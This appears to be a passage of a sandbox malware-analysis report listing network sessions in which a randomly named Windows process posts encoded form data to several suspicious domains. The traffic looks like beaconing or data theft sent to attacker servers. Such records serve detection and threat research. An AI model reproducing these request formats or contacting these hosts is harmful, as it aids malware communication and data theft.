Jan 10, 2025 20:26:15.197410107 CET	462	OUT	GET /cfcv/?rVu4SxF=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/HVtkfFoENqJsrfHfmbA9hKHiQ73oaQ==&JXYh=X6eL8Vp0 HTTP/1.1 Host: www.969-usedcar02.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Jan 10, 2025 20:26:15.661473036 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 19:26:15 GMT content-type: text/html; charset=utf-8 content-length: 1470 x-request-id: cd4f3e2d-7642-4fb0-acd7-cac34495153c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_l4AhFmhOS9BfkXYl2O179fhqueSD7DZSxccdH+BHT6MoLSd0LLgpY0Sh+LWaxM2PrMD0XAnXdZRJFRpYQnkcTg== set-cookie: parking_session=cd4f3e2d-7642-4fb0-acd7-cac34495153c; expires=Fri, 10 Jan 2025 19:41:15 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6c 34 41 68 46 6d 68 4f 53 39 42 66 6b 58 59 6c 32 4f 31 37 39 66 68 71 75 65 53 44 37 44 5a 53 78 63 63 64 48 2b 42 48 54 36 4d 6f 4c 53 64 30 4c 4c 67 70 59 30 53 68 2b 4c 57 61 78 4d 32 50 72 4d 44 30 58 41 6e 58 64 5a 52 4a 46 52 70 59 51 6e 6b 63 54 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_l4AhFmhOS9BfkXYl2O179fhqueSD7DZSxccdH+BHT6MoLSd0LLgpY0Sh+LWaxM2PrMD0XAnXdZRJFRpYQnkcTg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 20:26:15.661521912 CET	923	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2Q0ZjNlMmQtNzY0Mi00ZmIwLWFjZDctY2FjMzQ0OTUxNTNjIiwicGFnZV90aW1lIjoxNzM2NTM3MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	55729	8.136.96.106	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:21.064642906 CET	728	OUT	POST /b6bc/ HTTP/1.1 Host: www.juewucangku.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 196 Connection: close Origin: http://www.juewucangku.xyz Referer: http://www.juewucangku.xyz/b6bc/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 69 32 67 4d 4c 76 76 35 67 6a 6e 6c 50 51 2b 41 66 46 55 6e 4a 49 54 79 4c 4a 61 67 6f 6f 67 78 6b 4e 5a 77 36 30 2b 79 65 52 32 34 54 6c 73 6b 35 47 65 67 57 4a 34 6e 72 41 62 4a 67 43 53 6d 66 66 66 5a 6c 50 59 2b 67 65 2b 52 54 56 30 61 4f 38 71 4f 42 57 74 32 6e 76 41 56 31 70 6d 62 62 6a 49 70 73 58 75 70 6f 67 36 6d 7a 61 36 53 31 56 51 72 6a 76 79 4a 51 44 5a 30 38 47 54 31 69 62 49 2b 6d 62 6d 35 56 46 4c 57 4d 74 74 43 47 66 34 34 53 7a 4d 73 4f 43 43 35 79 36 50 39 75 78 37 61 4e 41 65 54 55 59 57 43 62 33 48 5a Data Ascii: rVu4SxF=8qp4YhFXg8NLi2gMLvv5gjnlPQ+AfFUnJITyLJagoogxkNZw60+yeR24Tlsk5GegWJ4nrAbJgCSmfffZlPY+ge+RTV0aO8qOBWt2nvAV1pmbbjIpsXupog6mza6S1VQrjvyJQDZ08GT1ibI+mbm5VFLWMttCGf44SzMsOCC5y6P9ux7aNAeTUYWCb3HZ
Jan 10, 2025 20:26:21.954849958 CET	403	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 19:26:21 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.juewucangku.xyz/b6bc/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	55730	8.136.96.106	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:23.614312887 CET	752	OUT	POST /b6bc/ HTTP/1.1 Host: www.juewucangku.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 220 Connection: close Origin: http://www.juewucangku.xyz Referer: http://www.juewucangku.xyz/b6bc/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 77 43 6b 4d 4d 49 62 35 33 54 6e 69 52 67 2b 41 51 6c 55 6a 4a 49 66 79 4c 49 65 77 6f 62 55 78 6c 74 70 77 31 52 65 79 64 52 32 34 62 46 73 68 39 47 65 72 57 4a 39 53 72 46 6a 4a 67 43 47 6d 66 64 33 5a 6c 34 4d 35 67 4f 2b 54 47 46 30 55 4b 38 71 4f 42 57 74 32 6e 75 6c 77 31 70 2b 62 61 53 34 70 74 31 57 71 68 41 36 6e 35 36 36 53 78 56 52 69 6a 76 79 52 51 43 31 53 38 41 58 31 69 66 4d 2b 6d 76 53 36 66 46 4c 51 43 4e 73 57 42 76 46 64 4c 55 63 68 45 52 36 61 6e 4c 2f 61 67 77 48 45 63 79 58 49 42 50 57 6c 63 51 4f 78 31 4b 44 52 46 2b 53 6e 6e 6b 50 2f 31 65 57 50 78 6c 61 4c 48 51 3d 3d Data Ascii: rVu4SxF=8qp4YhFXg8NLwCkMMIb53TniRg+AQlUjJIfyLIewobUxltpw1ReydR24bFsh9GerWJ9SrFjJgCGmfd3Zl4M5gO+TGF0UK8qOBWt2nulw1p+baS4pt1WqhA6n566SxVRijvyRQC1S8AX1ifM+mvS6fFLQCNsWBvFdLUchER6anL/agwHEcyXIBPWlcQOx1KDRF+SnnkP/1eWPxlaLHQ==
Jan 10, 2025 20:26:24.470488071 CET	403	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 19:26:24 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.juewucangku.xyz/b6bc/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	55731	8.136.96.106	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:26.162816048 CET	1765	OUT	POST /b6bc/ HTTP/1.1 Host: www.juewucangku.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1232 Connection: close Origin: http://www.juewucangku.xyz Referer: http://www.juewucangku.xyz/b6bc/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 38 71 70 34 59 68 46 58 67 38 4e 4c 77 43 6b 4d 4d 49 62 35 33 54 6e 69 52 67 2b 41 51 6c 55 6a 4a 49 66 79 4c 49 65 77 6f 61 73 78 6c 66 68 77 36 51 65 79 63 52 32 34 52 6c 73 67 39 47 65 32 57 4a 46 65 72 46 66 7a 67 42 2b 6d 66 38 58 5a 73 70 4d 35 7a 75 2b 54 65 31 30 56 4f 38 71 66 42 57 39 79 6e 75 31 77 31 70 2b 62 61 51 67 70 39 58 75 71 74 67 36 6d 7a 61 36 67 31 56 51 4c 6a 76 36 76 51 43 42 6b 39 77 33 31 6a 2f 63 2b 6b 36 6d 36 54 46 4c 53 42 4e 73 65 42 76 4a 4f 4c 51 45 74 45 52 2b 67 6e 49 76 61 68 6d 57 2b 59 68 6e 35 58 65 71 4c 66 69 43 51 30 38 6d 34 63 64 48 59 6c 30 7a 4c 30 2b 54 72 39 78 62 79 52 62 46 47 67 78 79 2b 47 70 78 63 59 30 38 43 52 4f 36 61 75 7a 42 76 69 72 4e 33 70 4b 63 4a 50 4e 4a 52 53 4c 43 73 4e 52 72 77 36 61 67 4a 71 48 4c 53 2b 41 78 77 64 54 45 33 6d 72 79 73 73 42 45 50 36 67 45 69 50 42 6d 74 67 4f 61 32 56 76 53 46 4e 6a 44 6b 65 53 4c 4d 5a 7a 61 53 50 45 48 55 43 63 32 65 5a 48 77 30 39 7a 58 61 38 6c 35 63 4b 71 6d 47 61 76 [TRUNCATED] Data Ascii: rVu4SxF=8qp4YhFXg8NLwCkMMIb53TniRg+AQlUjJIfyLIewoasxlfhw6QeycR24Rlsg9Ge2WJFerFfzgB+mf8XZspM5zu+Te10VO8qfBW9ynu1w1p+baQgp9Xuqtg6mza6g1VQLjv6vQCBk9w31j/c+k6m6TFLSBNseBvJOLQEtER+gnIvahmW+Yhn5XeqLfiCQ08m4cdHYl0zL0+Tr9xbyRbFGgxy+GpxcY08CRO6auzBvirN3pKcJPNJRSLCsNRrw6agJqHLS+AxwdTE3mryssBEP6gEiPBmtgOa2VvSFNjDkeSLMZzaSPEHUCc2eZHw09zXa8l5cKqmGav9AnC8IDfBlCiD6M0wC5Jzbn9dHxjHSu1xZt1W2BWEIiC2jWYuh3m85dnh/RCM5T95u2wnf8+kgRmxRtQpVkYAtFR1zJdE1zRevgZcvKIhf76BEeCplzkMXZgrnoCSDelX8dLg/d/Pv9yx6gWSmfQuKqZGHmZCR2hfysKh/TpRC7CMzAgrCjxvdGy7rLDcPQFUFKM1GFuhXxiN6h7M2y26PQ49t330od4vKl/JohAFkIodG8VwM70xYvL2AZEcGvClfTRnC3ry79ATN/awZPyxeZWzitRFVGbofsb+knvgjOqwdMfihjrIjViImthqFDPqI4GhkQO2V9dHRwR+Bo1/5xOfEVr7ckMYrHlu5wHiNTsOwZ280U1dTvPzO0hQlpRsTSUqoquiYbybLgr5KeaEIShEbujjm2ZNIDNG5jdbLTMrNFlMyi5f47+CbbDGJolZ5+D636WailXh4hXLOd07ugxN0rsGOM61OOpiSKV4mT5EkXbfHVC1C4xoevtZhTyaa/qL1uXo5bImf3bIKtS6q4CTmCx4VOo/mrbRjQk5vgLblJE8ybpE13m7c4Li8SIYMCc+2NWWDv+0HsMDyN0T7caedEA2Oc6jg2qXEH5BcQ8d4MjPRM4yc5vUmE5BFdQX8VgBC5XiHIqNQF8DHcMhnhQJp+SDsSaeD [TRUNCATED]
Jan 10, 2025 20:26:27.026252031 CET	403	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 19:26:26 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.juewucangku.xyz/b6bc/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	55732	8.136.96.106	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:28.700730085 CET	459	OUT	GET /b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUAi+2qRV04Y8KYMj5mgKl2iJfvRHsG+g== HTTP/1.1 Host: www.juewucangku.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Jan 10, 2025 20:26:29.575344086 CET	542	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 10 Jan 2025 19:26:29 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.juewucangku.xyz/b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUAi+2qRV04Y8KYMj5mgKl2iJfvRHsG+g== Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	55733	69.57.163.64	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:34.650109053 CET	737	OUT	POST /9er8/ HTTP/1.1 Host: www.startsomething.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 196 Connection: close Origin: http://www.startsomething.xyz Referer: http://www.startsomething.xyz/9er8/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 42 2f 76 4e 38 35 45 71 72 74 2b 74 31 66 73 62 41 4c 4a 57 6a 2b 61 75 45 55 69 70 33 69 30 69 6d 4d 6c 4c 43 38 46 4a 35 68 6c 46 33 61 59 32 33 65 51 2f 57 44 77 54 73 6b 71 6c 75 53 47 34 5a 6d 4d 58 42 47 67 6f 45 6d 5a 75 34 67 38 5a 61 31 34 72 35 70 4a 6c 47 62 74 32 2b 70 31 55 4b 79 59 79 62 35 48 52 65 36 6d 5a 73 37 67 59 52 64 69 54 59 31 51 72 66 6b 51 66 55 63 72 76 79 37 7a 74 49 61 43 76 66 73 67 46 4c 53 42 73 30 4f 66 56 4c 7a 74 39 6e 73 55 45 47 2b 69 66 32 31 6e 2b 4a 4b 6c 48 65 4b 68 4d 76 35 54 4e Data Ascii: rVu4SxF=/2xwZle+gMwsB/vN85Eqrt+t1fsbALJWj+auEUip3i0imMlLC8FJ5hlF3aY23eQ/WDwTskqluSG4ZmMXBGgoEmZu4g8Za14r5pJlGbt2+p1UKyYyb5HRe6mZs7gYRdiTY1QrfkQfUcrvy7ztIaCvfsgFLSBs0OfVLzt9nsUEG+if21n+JKlHeKhMv5TN
Jan 10, 2025 20:26:35.237178087 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	55734	69.57.163.64	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:37.200119019 CET	761	OUT	POST /9er8/ HTTP/1.1 Host: www.startsomething.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 220 Connection: close Origin: http://www.startsomething.xyz Referer: http://www.startsomething.xyz/9er8/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 54 4f 66 4e 2b 65 77 71 73 4e 2b 79 72 50 73 62 4f 72 4a 53 6a 2f 6d 75 45 56 58 75 33 51 67 69 68 75 74 4c 51 6f 5a 4a 36 68 6c 46 75 71 59 75 35 2b 51 4b 57 44 30 74 73 6c 57 6c 75 53 53 34 5a 6a 77 58 42 57 63 70 46 32 5a 73 68 51 38 62 58 56 34 72 35 70 4a 6c 47 62 34 52 2b 70 74 55 4a 43 6f 79 5a 59 48 57 51 61 6d 61 6b 62 67 59 56 64 69 66 59 31 52 4d 66 67 77 6c 55 65 6a 76 79 2f 33 74 49 4a 61 73 56 73 68 41 42 79 41 53 31 74 47 4e 50 54 52 64 73 71 63 7a 59 39 4f 47 38 30 62 67 59 34 73 63 4c 64 68 72 6f 65 61 6c 73 4d 47 56 4a 68 51 4a 5a 57 2f 5a 37 6f 78 69 68 41 4c 75 48 51 3d 3d Data Ascii: rVu4SxF=/2xwZle+gMwsTOfN+ewqsN+yrPsbOrJSj/muEVXu3QgihutLQoZJ6hlFuqYu5+QKWD0tslWluSS4ZjwXBWcpF2ZshQ8bXV4r5pJlGb4R+ptUJCoyZYHWQamakbgYVdifY1RMfgwlUejvy/3tIJasVshAByAS1tGNPTRdsqczY9OG80bgY4scLdhroealsMGVJhQJZW/Z7oxihALuHQ==
Jan 10, 2025 20:26:37.821089983 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:37 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	55735	69.57.163.64	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:39.821970940 CET	1774	OUT	POST /9er8/ HTTP/1.1 Host: www.startsomething.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1232 Connection: close Origin: http://www.startsomething.xyz Referer: http://www.startsomething.xyz/9er8/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 54 4f 66 4e 2b 65 77 71 73 4e 2b 79 72 50 73 62 4f 72 4a 53 6a 